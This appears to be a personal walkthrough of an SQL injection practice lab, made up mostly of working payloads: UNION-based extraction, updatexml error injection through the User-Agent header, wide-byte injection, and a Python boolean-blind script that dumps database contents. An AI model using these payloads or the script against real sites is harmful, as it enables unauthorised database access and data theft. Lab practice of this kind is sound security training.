Sql-Labs 练习
http://inject2.lab.aqlab.cn:81/
pass-01
union select 1,database(),3
# error
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='error'
# error_flag,user
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='error_flag'
# Id,flag
union select 1,group_concat(flag),3 from error_flag
# Your Login name:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K
pass0x2 字符型
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,2,'3
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,database(),'3
# error
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='error
# error_flag,user
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='error_flag
# Id,flag
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,group_concat(flag),3 from error_flag %23
# zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K
pass0x3
('1') 拼接
pass0x4
("1") 拼接
http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union select 1,group_concat(flag),3 from error_flag %23
pass0x5
union select 1,database(),3 #
#post_error
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='post_error'#
#flag,user
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#
#Id,flag
union select 1,group_concat(flag),3 from flag #
#Id,flag
pass0x6
("123") 拼接
pass-07
爆破用户名密码后,根据源码提示在header中useragent处,进行报错注入
'or updatexml(1,concat(0x7e,user()),1),1)#
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag_head')),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
pass-08
注入点变成refer了。
pass-09
注入点变成x-forward了。
pass-10 布尔盲注
import sys
import time
from requests_html import AsyncHTMLSession, HTMLSession
start_time = time.time()
session = HTMLSession()
proxies = {}
url = 'http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1'
flag_success = '有数据'
payload1_database_length = ' and length(database())={}'
payload_database = ' and ord(substr(database(),{},1))>{}'
payload_table = ' and ord( SUBSTR((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}'
payload_column = ' and ord( SUBSTR((select group_concat(column_name) from information_schema.columns where table_name="{}"),{},1))>{}'
payload_data = ' and ord( SUBSTR((select group_concat({column_name}) from {table_name}),{},1))>{}'
def database_length():
for i in range(128):
sql = url + payload1_database_length.format(i)
res = session.get(sql)
if flag_success in res.text:
print('database length = ', i)
break
def database():
db = ''
for i in range(1, 128):
s = search(i, payload_database)
if not 32 < ord(s) <= 128:
break
db += s
print('database = ', db)
def search(index, payload):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
sql = url + payload.format(index, mid)
res = session.get(sql)
if flag_success in res.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if mid == 32:
break
return chr(mid)
def table():
db = ''
for i in range(1, 128):
s = search(i, payload_table)
if not 32 < ord(s) <= 128:
break
db += s
print('table = ', db)
def column(table_name):
db = ''
for i in range(1, 128):
s = search(i, payload_column.format(table_name, '{}', '{}'))
if not 32 < ord(s) <= 128:
break
db += s
print('column = ', db)
def data(column_name, table_name):
db = ''
for i in range(1, 128):
s = search(i, payload_data.format('{}', '{}', column_name=column_name, table_name=table_name))
if not 32 < ord(s) <= 128:
break
db += s
print('data = ', db)
if __name__ == '__main__':
# database_length()
# database() # 'kanwolongxia'
# table() # 'loflag'
# column('loflag') # Id,flaglo
data('flaglo','loflag') # Id,flaglo
print("--- %s seconds ---" % (time.time() - start_time))
pass-0x15
宽字节注入
id=1%df' union select 1,database(),3%23
pass-0x16
宽字节注入
id=1%df") union select 1,database(),3%23